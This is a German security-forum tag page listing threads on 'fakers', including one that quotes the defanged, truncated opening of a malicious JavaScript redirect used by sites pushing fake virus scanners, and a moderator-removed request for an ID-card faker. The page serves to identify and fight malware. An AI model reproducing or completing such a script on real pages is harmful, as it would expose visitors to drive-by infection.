Zurück   Trojaner-Board > Themen

Alles zum Thema: Faker

  Letzter Beitrag Antworten Hits Forum
Fake Virusscanner
Faker - Die Dateien werden von Webseiten heruntergeladen die diesen Code enthalten: < script > var url="hxxp://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var...
Plagegeister aller Art und deren Bekämpfung
Virus oder eher nicht ??
Faker - Hay Leute ich habe mal eine frage da ich mit Norton Internet Security noch nicht wircklich klar komme wollte ich mal Fragen ob ich einen Virus auf den pc habe ... Ich habe mir grade einen Hitfaker ( Pennergame ) heruntergeladen dann ist ein Fenster unten Rechts aufgepopt.. da ich niregnds...
Antiviren-, Firewall- und andere Schutzprogramme
Personal Ausweis Faker
Faker - Hallo leute, EDIT: Dieses Anliegen verstößt gegen die NUB. - schneipi Danke und MfG just1n
Mülltonne
Archiv
Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.